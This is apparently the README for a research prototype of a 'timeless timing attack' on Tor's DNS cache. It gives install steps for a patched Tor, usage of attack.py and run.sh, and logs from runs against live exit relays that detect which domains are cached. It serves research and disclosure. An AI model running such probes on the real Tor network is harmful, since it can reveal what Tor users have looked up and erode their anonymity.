# Attack prototype

These instructions help you get started with our timeless timing attack.  We
conclude by showing the required steps to reproduce Section 3.3.

## Install

On an Ubuntu/Debian system:

    # pip install carml
    # apt install make automake gcc libevent-dev libssl-dev zlib1g zlib1g-dev asciidoc
    $ git clone https://gitlab.torproject.org/tpo/core/tor.git
    $ cd tor
    $ git checkout -b timeless tags/tor-0.4.6.6
    $ git am ../tor-0.4.6.6.patch
    $ ./autogen.sh
    $ ./configure && make
    # make install
    ```

## Quick test

Terminal 1:
    
    $ cat torrc
    CookieAuthentication 1
    CookieAuthFileGroupReadable 1
    ControlPort 9051
    $ tor -f torrc --Log Debug 2>&1 | grep timeless:

Terminal 2:

    $ tor-resolve foo.rgdd.se--sc
    0.0.0.0
    $ tor-resolve foo.rgdd.se--sc
    1.1.1.1

The first time `foo.rgdd.se` is uncached, indicated by 0.0.0.0 output.  The
second time `foo.rgdd.se` is cached, indicated by 1.1.1.1 output.  Note that
these special values are set by our tor patch, and that there could be false
positives since we are not running with a one-hop circuit.  Let's do that now:

Terminal 2, again:

    $ ./attack.py --socks-port 10001 --control-port 10002 -r DFRI0 -n bar.rgdd.se
    [INFO] 2022-05-16 13:42:17,445: running timeless timing attack on DFRI0 with 1 names
    [INFO] 2022-05-16 13:42:17,446: logs are stored in /tmp/timeless-timing-attack
    [DEBUG] 2022-05-16 13:42:17,471: launching tor with socks port 10001 and control port 10002
    [DEBUG] 2022-05-16 13:42:27,484: chunk 1: preparing to run 1 resolves
    [DEBUG] 2022-05-16 13:42:27,484: building circuit via DFRI0
    [DEBUG] 2022-05-16 13:42:30,799: attaching new streams to circuit 22
    [DEBUG] 2022-05-16 13:42:35,886: next resolve is bar.rgdd.se--sc
    [DEBUG] 2022-05-16 13:42:35,914: removing carml's stream attacher
    [DEBUG] 2022-05-16 13:42:40,922: deleting circuit 22
    [DEBUG] 2022-05-16 13:42:42,599: closing tor
    [INFO] 2022-05-16 13:42:47,614: received 1/1 answers
    0
    $ ./attack.py --socks-port 10001 --control-port 10002 -r DFRI0 -n bar.rgdd.se
    [INFO] 2022-05-16 13:43:13,268: running timeless timing attack on DFRI0 with 1 names
    [INFO] 2022-05-16 13:43:13,268: logs are stored in /tmp/timeless-timing-attack
    [DEBUG] 2022-05-16 13:43:13,296: launching tor with socks port 10001 and control port 10002
    [DEBUG] 2022-05-16 13:43:18,302: chunk 1: preparing to run 1 resolves
    [DEBUG] 2022-05-16 13:43:18,302: building circuit via DFRI0
    [DEBUG] 2022-05-16 13:43:20,048: attaching new streams to circuit 6
    [DEBUG] 2022-05-16 13:43:25,065: next resolve is bar.rgdd.se--sc
    [DEBUG] 2022-05-16 13:43:25,114: removing carml's stream attacher
    [DEBUG] 2022-05-16 13:43:30,123: deleting circuit 6
    [DEBUG] 2022-05-16 13:43:31,821: closing tor
    [INFO] 2022-05-16 13:43:36,837: received 1/1 answers
    1

Possible output values are:

  -  0: uncached
  -  1: cached
  - -1: query failed (stream was attached to circuit)
  - -2: query failed (stream was not attached to circuit)

See usage message for further details:

    $ ./attack.py --help
    usage: attack.py [-h] [-d DIRECTORY] [-s SOCKS_PORT] [-c CONTROL_PORT]
                     [-r RELAY] [-n NAMES] [-m CHUNKS]
    
    timeless timing attack against tor's DNS cache
    
    optional arguments:
      -h, --help            show this help message and exit
      -d DIRECTORY, --directory DIRECTORY
                            directory to store log files and tor's data directory
                            (Default: /tmp/timeless-timing-attack)
      -s SOCKS_PORT, --socks-port SOCKS_PORT
                            tor socks port (Default: 9050)
      -c CONTROL_PORT, --control-port CONTROL_PORT
                            tor control port (Default: 9051)
      -r RELAY, --relay RELAY
                            relay to build a one-hop circuit to (Default: DFRI0)
      -n NAMES, --names NAMES
                            comma-separated list of domains names to resolve
                            (Default: rgdd.se,pulls.name)
      -m CHUNKS, --chunks CHUNKS
                            maximum number of timeless timing attack resolves to
                            run in the same circuit (Default: 1000)

## Experiment

You need to keep a tor instance running at all times with control port 9051,
see "Terminal one".  There is no need for debugging output, however.

    $ cat torrc
    CookieAuthentication 1
    CookieAuthFileGroupReadable 1
    ControlPort 9051
    $ tor -f torrc

Usage of the run script is as follows:

    $ ./run.sh LOG_DIR SOCKS_PORT CONTROL_PORT DOMAIN_NAME NUM_TEST

`LOG_DIR`, `SOCKS_PORT`, and `CONTROL_PORT` must be unique on the running system.

`DOMAIN_NAME` is a domain name that supports wildcard queries, such as `rgdd.se`.

`NUM_TEST` is the number of uncached and cached timeless timing attack queries to run.

### Example

    ./run.sh /tmp/tta-12 10001 10002 rgdd.se 10
    2022-05-16 14:03:38 [INFO] writing logs to /tmp/tta-12
    2022-05-16 14:03:38 [INFO] base domain is rgdd.se
    2022-05-16 14:03:38 [INFO] num test is 10
    2022-05-16 14:03:38 [INFO] random id is 10379
    2022-05-16 14:03:38 [INFO] run 1: waiting five seconds before start, ctrl+c to cancel
    2022-05-16 14:03:54 [INFO] selected exit relay fourwinds01
    fourwinds01 1652702634 0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1
    2022-05-16 14:04:25 [INFO] run 2: waiting five seconds before start, ctrl+c to cancel
    2022-05-16 14:04:42 [INFO] selected exit relay Quintex44
    Quintex44 1652702682 0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1
    2022-05-16 14:05:12 [INFO] run 3: waiting five seconds before start, ctrl+c to cancel
    ^C
    $

To make a clean exit, wait until run says that it is ok to ctrl+c.

The debug info emitted by attack.py was as follows for Quintex44:

    $ tail -f /tmp/tta-12/attack.info
    ...
    tail: /tmp/tta-12/attack.info: file truncated
    [INFO] 2022-05-16 14:04:42,212: running timeless timing attack on Quintex44 with 20 names
    [INFO] 2022-05-16 14:04:42,213: logs are stored in /tmp/tta-10001-10002
    [DEBUG] 2022-05-16 14:04:42,240: launching tor with socks port 10001 and control port 10002
    [DEBUG] 2022-05-16 14:04:47,248: chunk 1: preparing to run 20 resolves
    [DEBUG] 2022-05-16 14:04:47,249: building circuit via Quintex44
    [DEBUG] 2022-05-16 14:04:49,817: attaching new streams to circuit 6
    [DEBUG] 2022-05-16 14:04:54,834: next resolve is 1.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:04:55,505: next resolve is 1.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:04:55,652: next resolve is 2.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:04:56,214: next resolve is 2.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:04:56,360: next resolve is 3.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:04:56,690: next resolve is 3.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:04:56,836: next resolve is 4.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:04:57,161: next resolve is 4.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:04:57,309: next resolve is 5.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:04:57,640: next resolve is 5.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:04:57,788: next resolve is 6.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:04:58,451: next resolve is 6.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:04:58,599: next resolve is 7.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:04:59,243: next resolve is 7.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:04:59,394: next resolve is 8.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:04:59,721: next resolve is 8.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:04:59,869: next resolve is 9.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:05:00,199: next resolve is 9.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:05:00,348: next resolve is 10.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:05:00,678: next resolve is 10.10379.1652702682.rgdd.se--sc
    [DEBUG] 2022-05-16 14:05:00,830: removing carml's stream attacher
    [DEBUG] 2022-05-16 14:05:05,834: deleting circuit 6
    [DEBUG] 2022-05-16 14:05:07,551: closing tor
    [INFO] 2022-05-16 14:05:12,567: received 20/20 answers

The detailed debug log is only stored if we failed to perform any look-up
(because we do not get an entry in our data set if no queries succeeded).

### Run

On the same system in four different tmux panes:
 
    $ mkdir data
    $ ./run.sh data/12 10001 10002 kau-research.rgdd.se 500 2>data/12.info >data/12.data
    $ ./run.sh data/34 10003 10004 kau-research.rgdd.se 500 2>data/34.info >data/34.data
    $ ./run.sh data/56 10005 10006 kau-research.rgdd.se 500 2>data/56.info >data/56.data
    $ ./run.sh data/78 10007 10008 kau-research.rgdd.se 500 2>data/78.info >data/78.data

Double-check that each runner got its own unique random id.

### View

    $ ./view.py -f data/*.data
    2023-03-06 19:16:39,840 __main__ [INFO] using data files: ['data/12.data', 'data/34.data', 'data/56.data', 'data/78.data']
    start: 2022-05-17 21:55:56
    stop:  2022-05-26 00:15:40
    num run: 14446 (4 runners)
    qps tor: 34.5
    qps dns: 8.6
    uncached look-ups
       ok: 6034779
      nok: 0
      ???: 2858
      sum: 6037637
    cached look-ups
       ok: 6034594
      nok: 0
      ???: 142
      sum: 6034736

`qps tor` is the number of RESOLVE cells sent to the Tor network (average).

`qps dns` is the number of DNS requests leaving the Tor network (average).

`ok` is the number of expected answers.

`nok` is the number of unexpected answers.

`???` is the number of unknown answers (resolve failure, attach failure, etc).

## Contact

Reach out to Rasmus Dahlberg via email: `rasmus (at) rgdd (dot) se`.
